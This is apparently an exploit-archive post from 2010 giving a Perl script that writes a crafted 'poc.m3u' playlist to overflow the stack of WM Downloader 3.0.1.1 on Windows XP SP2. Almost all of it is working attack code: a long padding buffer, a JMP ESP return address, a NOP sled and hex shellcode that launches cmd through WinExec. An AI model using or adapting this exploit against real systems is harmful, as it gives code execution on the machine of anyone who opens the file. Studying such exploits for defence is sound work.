[local exploits] - WM Downloader 3.0.1.1 stack buffer overfl
Posted on 19 September 2010
<pre>
===========================================
WM Downloader 3.0.1.1 stack buffer overflow
===========================================

#WM Downloader 3.0.1.1 stack buffer overflow
#Author Sanjeev Gupta san.gupta86[at]gmail.com
#Download Vulnerable application from http://en.softonic.com/s/download-free-wm-capture
#Vulnerable version WM Downloader 3.0.1.1
#Tested on XP SP2
#Greets Puneet Jain

my $buff = "\x41" x 26076;      # padding up to the saved return address
my $eip = "\x65\x82\xa5\x7c";   #7CA58265 FFE4 JMP ESP
my $nop = "\x90" x 12;          # short NOP sled ahead of the payload

# payload placed directly after the overwritten return address
my $code = "\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B".
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9".
"\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C".
"\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0".
"\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B".
"\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72".
"\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03".
"\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47".
"\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F".
"\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72".
"\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66".
"\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14".
"\x8E\x03\xD3\x52\x68\x78\x65\x63\x01\xFE".
"\x4C\x24\x03\x68\x57\x69\x6E\x45\x54\x53".
"\xFF\xD2\x68\x63\x6D\x64\x01\xFE\x4C\x24".
"\x03\x6A\x05\x33\xC9\x8D\x4C\x24\x04\x51".
"\xFF\xD0\x68\x65\x73\x73\x01\x8B\xDF\xFE".
"\x4C\x24\x03\x68\x50\x72\x6F\x63\x68\x45".
"\x78\x69\x74\x54\xFF\x74\x24\x20\xFF\x54".
"\x24\x20\x57\xFF\xD0";

# write padding, return address, NOP sled and payload as one playlist entry
my $filename = "poc.m3u";
open(FILE, ">$filename") or die "Cannot open $filename: $!";
print FILE $buff.$eip.$nop.$code;
close(FILE);

# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-19]
</pre>